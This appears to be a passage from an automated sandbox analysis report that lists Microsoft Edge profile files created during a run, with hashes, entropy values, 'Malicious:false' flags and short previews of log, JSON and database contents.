                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.637 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:57:47.638 1ff4 Recovering log #3.2024/12/23-00:57:47.638 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.201526715958087
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdIL4q2P923oH+Tcwt865IFUt8VRraNNJZmw+VRfILDkwO923oH+Tcwt86+ULJ:++4v4Yeb/WFUt8KnJ/+ULD5LYeb/+SJ
                                                                                                                                                                                                                                                                                    MD5:BFED54BA9C4ED61CEA8B173DE8F96F3D
                                                                                                                                                                                                                                                                                    SHA1:99298FD1017DFD48B28D5097F8AE8B091D487229
                                                                                                                                                                                                                                                                                    SHA-256:D0D80D3A68F5EED8B106D8CADC20EDD9F9295439CCD5A5327989F5FE81D07DF1
                                                                                                                                                                                                                                                                                    SHA-512:0953C2C5FB0BB49371E938116F2461A93AF66C74080A1F1828D6EFF818D2A94F0D0241B05893D20384297957A4BE696E7DE82F7D9BA3C054DF556B6518819841
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.652 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:57:47.654 1ff4 Recovering log #3.2024/12/23-00:57:47.799 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.201526715958087
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdIL4q2P923oH+Tcwt865IFUt8VRraNNJZmw+VRfILDkwO923oH+Tcwt86+ULJ:++4v4Yeb/WFUt8KnJ/+ULD5LYeb/+SJ
                                                                                                                                                                                                                                                                                    MD5:BFED54BA9C4ED61CEA8B173DE8F96F3D
                                                                                                                                                                                                                                                                                    SHA1:99298FD1017DFD48B28D5097F8AE8B091D487229
                                                                                                                                                                                                                                                                                    SHA-256:D0D80D3A68F5EED8B106D8CADC20EDD9F9295439CCD5A5327989F5FE81D07DF1
                                                                                                                                                                                                                                                                                    SHA-512:0953C2C5FB0BB49371E938116F2461A93AF66C74080A1F1828D6EFF818D2A94F0D0241B05893D20384297957A4BE696E7DE82F7D9BA3C054DF556B6518819841
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.652 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:57:47.654 1ff4 Recovering log #3.2024/12/23-00:57:47.799 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.156544936296632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdZ+q2P923oH+Tcwt8NIFUt8VRd1Zmw+VRdZVkwO923oH+Tcwt8+eLJ:Bv4YebpFUt8j/+55LYebqJ
                                                                                                                                                                                                                                                                                    MD5:0E7231C5DEB6005328411FAB3A99E79A
                                                                                                                                                                                                                                                                                    SHA1:D997ED40FC385FE49B97CB2469A77F940865E6BE
                                                                                                                                                                                                                                                                                    SHA-256:AF6B4B36F8CD646ED6DD0220DEECEB87C500D1F5F9C067928D91595255E65AE7
                                                                                                                                                                                                                                                                                    SHA-512:DB1BFC80CDCD5DB084F637E700951671FD5FEDA59E5ADA35A8524DFBC4ABEB17BA99960D023A71DB922F374D7024A9FCF82DA280EF6A53BAD658509853136AB9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.772 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:57:48.772 1fe8 Recovering log #3.2024/12/23-00:57:48.772 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.156544936296632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdZ+q2P923oH+Tcwt8NIFUt8VRd1Zmw+VRdZVkwO923oH+Tcwt8+eLJ:Bv4YebpFUt8j/+55LYebqJ
                                                                                                                                                                                                                                                                                    MD5:0E7231C5DEB6005328411FAB3A99E79A
                                                                                                                                                                                                                                                                                    SHA1:D997ED40FC385FE49B97CB2469A77F940865E6BE
                                                                                                                                                                                                                                                                                    SHA-256:AF6B4B36F8CD646ED6DD0220DEECEB87C500D1F5F9C067928D91595255E65AE7
                                                                                                                                                                                                                                                                                    SHA-512:DB1BFC80CDCD5DB084F637E700951671FD5FEDA59E5ADA35A8524DFBC4ABEB17BA99960D023A71DB922F374D7024A9FCF82DA280EF6A53BAD658509853136AB9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.772 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:57:48.772 1fe8 Recovering log #3.2024/12/23-00:57:48.772 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8720
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.21861961848037048
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:bBRtFlljq7A/mhWJFuQ3yy7IOWUL/cdweytllrE9SFcTp4AGbNCV9RUIGR:9K75fO6d0Xi99pEYkR
                                                                                                                                                                                                                                                                                    MD5:B801646633D31D432C10068055658FE7
                                                                                                                                                                                                                                                                                    SHA1:13E8F0D5706627F2B31F8599C03927A837DC9A85
                                                                                                                                                                                                                                                                                    SHA-256:2658CA8D124E44DDDA32A42BE4E471371209FDCFB52CC4B1DD3E2F22FB025C7B
                                                                                                                                                                                                                                                                                    SHA-512:D3B0E5561BB2DDF6375CF97410D67FE3E2918BB44C74D143D5F602A624DAAAE9BFA492A041CF5C4A44D2DA1E386B6B1BD2AC5BF3CD875B013881CB7DD68FA43E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:............{1.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6477372942424546
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:aj9P0xxP/KbtfjlgQkQerGcg773pL9hCgam6ItRKToaAu:adwP/ylge2pg7Pv9RKcC
                                                                                                                                                                                                                                                                                    MD5:7285C7358A1CFD7685046CB8F4899A3E
                                                                                                                                                                                                                                                                                    SHA1:2B993CD42C9BE128E59F7CCF675ADB34ADAFDE65
                                                                                                                                                                                                                                                                                    SHA-256:203B1D6301FB7C5259A5C2EF3C7045E261A95DFFCD278F85E424EF7630CC2AC9
                                                                                                                                                                                                                                                                                    SHA-512:914EF7CB273B9535FE3D662C71C91AC5CBA4F3BE49326A072D0F92BFF7224772EB5EF340919BDFE1BC82A5BD089CB0DDBA06188FE345D4AC25A7014E839D661A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.27179308171188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:FPv4Yeb8rcHEZrELFUt8ar/+ah5LYeb8rcHEZrEZSJ:Z4Yeb8nZrExg8kLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:DFCB1929AF75D88FFAB69607016E0132
                                                                                                                                                                                                                                                                                    SHA1:26313B423430A69B4CB4A6E204CD6E0BD29FF88A
                                                                                                                                                                                                                                                                                    SHA-256:8AD5C11CDCF5341F5D953AC096515FF84D6181F19E6B3D8F5A60DFC70DD21115
                                                                                                                                                                                                                                                                                    SHA-512:F5F2B50B91556ADCC160C13E9537209304891AFFCFB60C967D7800E89923B5CA91E0F28D0DA7CC93F230A9A3D731993499FE82BA932B0C167F1DFCE91A9EA357
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.045 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:57:52.046 1fe8 Recovering log #3.2024/12/23-00:57:52.046 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.27179308171188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:FPv4Yeb8rcHEZrELFUt8ar/+ah5LYeb8rcHEZrEZSJ:Z4Yeb8nZrExg8kLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:DFCB1929AF75D88FFAB69607016E0132
                                                                                                                                                                                                                                                                                    SHA1:26313B423430A69B4CB4A6E204CD6E0BD29FF88A
                                                                                                                                                                                                                                                                                    SHA-256:8AD5C11CDCF5341F5D953AC096515FF84D6181F19E6B3D8F5A60DFC70DD21115
                                                                                                                                                                                                                                                                                    SHA-512:F5F2B50B91556ADCC160C13E9537209304891AFFCFB60C967D7800E89923B5CA91E0F28D0DA7CC93F230A9A3D731993499FE82BA932B0C167F1DFCE91A9EA357
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.045 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:57:52.046 1fe8 Recovering log #3.2024/12/23-00:57:52.046 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.652458346727815
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:sZgmvaSTXZSMpV03Sx4/syhat3E4X7AHHk2GJ348ylsT:sHvaSLFpe/dP8osT
                                                                                                                                                                                                                                                                                    MD5:982F4E37F81D3FBBF19A8EE6AECD4F3D
                                                                                                                                                                                                                                                                                    SHA1:3495BE0AC1568A4EBF82292F2F27D337B245A027
                                                                                                                                                                                                                                                                                    SHA-256:1E0569283CFE254F750131CCB8E83445A8D01C67915CEC470EF32780CD576226
                                                                                                                                                                                                                                                                                    SHA-512:5F65B3EEAFAB580877746A34822B4DFA23231CBB6997B90AE9EDF2AADDED0280AB541BD77545E62DB84BA86CC9A61EF0F977840E658DF4E9232E225CBC37DC06
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.3...................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1734933482494.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734933483469.._https://ntp.msn.com..MUID!.1527A764E6A86BDB2DE6B23AE7AF6A4B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734933482597,"schedule":[-1,-1,30,36,33,-1,-1],"scheduleFixed":[-1,-1,30,36,33,-1,-1],"simpleSchedule":[37,24,46,36,31,16,10]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734933482460.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Dec 23 2024 00:58:02 GMT-0500 (Eastern Standa

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.143917806489423
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdI1Iq2P923oH+Tcwt8a2jMGIFUt8VRdcZZmw+VRd8FU1zkwO923oH+Tcwt8a23:L1Iv4Yeb8EFUt8mZ/+CFe5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:3F98390B57C2556A5E5B7ABA7BAE50C5
                                                                                                                                                                                                                                                                                    SHA1:D9AF74BB8E166294D04D192F598E3F4D623DBE7D
                                                                                                                                                                                                                                                                                    SHA-256:CEDE11797D513AA5C69DF81931DC0C1454CF5A90D26A83FECD80A96579561B0A
                                                                                                                                                                                                                                                                                    SHA-512:CD94B32F31A8F97CC682EEA29CCB0E801E2899769599C108439C76DA67F8C01A04454804E7474E86556B505E8DAC50955180FAD129E8570821C75135D4998250
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.044 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.046 1a10 Recovering log #3.2024/12/23-00:57:48.049 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.143917806489423
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdI1Iq2P923oH+Tcwt8a2jMGIFUt8VRdcZZmw+VRd8FU1zkwO923oH+Tcwt8a23:L1Iv4Yeb8EFUt8mZ/+CFe5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:3F98390B57C2556A5E5B7ABA7BAE50C5
                                                                                                                                                                                                                                                                                    SHA1:D9AF74BB8E166294D04D192F598E3F4D623DBE7D
                                                                                                                                                                                                                                                                                    SHA-256:CEDE11797D513AA5C69DF81931DC0C1454CF5A90D26A83FECD80A96579561B0A
                                                                                                                                                                                                                                                                                    SHA-512:CD94B32F31A8F97CC682EEA29CCB0E801E2899769599C108439C76DA67F8C01A04454804E7474E86556B505E8DAC50955180FAD129E8570821C75135D4998250
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.044 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.046 1a10 Recovering log #3.2024/12/23-00:57:48.049 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\290b15a5-8383-48eb-8424-853efb385f38.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2a74f5d3-95f0-423b-aeaa-f8df50f732fd.tmp

                                                                                                                                                                                                                                                                                    Download File
